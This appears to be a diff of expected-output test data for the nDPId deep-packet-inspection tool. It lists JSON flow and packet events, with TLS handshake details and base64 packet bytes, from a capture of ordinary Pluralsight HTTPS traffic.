AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359576,"flow_last_seen":1648373359576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359576,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1648373359576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359576,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TutAAEAGHxbAqAGAaBOif780Abvdb02GAAAAAKAC+vDHywAAAgQFtAQCCArb1PDNAAAAAAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1648373359597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359597,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGdQloE6J\/wKgBgAG7vzSUVFy03W9Nh4AS\/\/\/FjwAAAgQFeAEBBAIBAwMK"} -01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1648373359600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359600,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItTu1AAEAGHSPAqAGAaBOif780Abvdb02HlFRctVAYAfYwgAAAFgMBAgABAAH8AwOIgQTFWwPXqiGWcEl1+ZXYiujgmOb6nQAZYCe\/QQpLyiA8RROCb85LShovAJOvtUQPlP7tKhROlf321DTdV6NmHgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGT2toAAAAAABgAFgAAE3d3dy5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAgKCgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKQoKAAEAAB0AIEbEu4abSNoKA92bDrKiGkIvMOu6w9kvXP7U129h\/FVaAC0AAgEBACsABwaamgMEAwMAGwADAgACRGkABQADAmgyGhoAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359646,"flow_last_seen":1648373359646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359646,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1648373359646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359646,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8yIlAAEAGdgjAqAGAaBHR8K7iAbvIMdGjAAAAAKAC+vD8DgAAAgQFtAQCCArhZSj9AAAAAAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1648373359662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359662,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGRZpoEdHwwKgBgAG7ruI30m4VyDHRpIAS\/\/+CtAAAAgQFeAEBBAIBAwMK"} -01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1648373359662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItyItAAEAGdBXAqAGAaBHR8K7iAbvIMdGkN9JuFlAYAfapQAAAFgMBAgABAAH8AwNnKyM21\/SbS3Q02cIKvbAgcmV67HQB0KXsoOxxl9v++yDRdtN3P07Qel84K9CWVDBxLwdJHbn9d9oomO2+9M0CRgAgenoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAAD4APAAAOXpuNnF6cTZjYWF1Y3VkZXNyLXBsdXJhbHNpZ2h0LnNpdGVpbnRlcmNlcHQucXVhbHRyaWNzLmNvbQAXAAD\/AQABAAAKAAoACLq6AB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApuroAAQAAHQAgm5zCzvNJzsWd1VyD4DXwZiQmlSanX10JAobLY4rSfTUALQACAQEAKwAHBsrKAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAJ4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373355763,"flow_last_seen":1648373355763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373355763,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648373355763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355763,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8t1dAAEAGzuTAqAGANkW8EqaSAbs5mmmUAAAAAKAC+vDIPgAAAgQFtAQCCAqK+PnbAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648373355952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373355952,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOAG5js2RbwSwKgBgAG7ppJ9QO7SOZpplaASaN998gAAAgQFtAQCCApSMR4Hivj52wEDAwg="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648373355952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373355952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5t1lAAEAGzOXAqAGANkW8EqaSAbs5mmmVfUDu04AYAfbrKAAAAQEICor4+pdSMR4HFgMBAgABAAH8AwM1jCFDKADpkwCWNDdgH\/adXVGzDgYuQsQMuim+6yCdjCAuElAWaAcNbYd22pDJpusrU2oMuj5gm\/t2Aky6e512VAAgamoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABQAEgAAD3BsdXJhbHNpZ2h0LmNvbQAXAAD\/AQABAAAKAAoACCoqAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApKioAAQAAHQAgy0tnman9YKIJBU2tFJ\/X+H4+8C285s8hNvU9rt60YmAALQACAQEAKwAHBgoKAwQDAwAbAAMCAAJEaQAFAAMCaDJqagABAAAVAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373355763,"flow_last_seen":1648373355952,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373355952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1648373355763,"flow_last_seen":1648373356139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6107,"flow_avg_l4_payload_len":872,"midstream":0,"thread_ts_msec":1648373356139,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.com","server_names":"*.pluralsight.com,pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357854,"flow_last_seen":1648373357854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357854,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648373357854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357854,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tRVAAEAG8mLAqAGAkks+0KceAbt\/83TdAAAAAKAC+vCjygAAAgQFtAQCCAquLcooAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357861,"flow_last_seen":1648373357861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357861,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 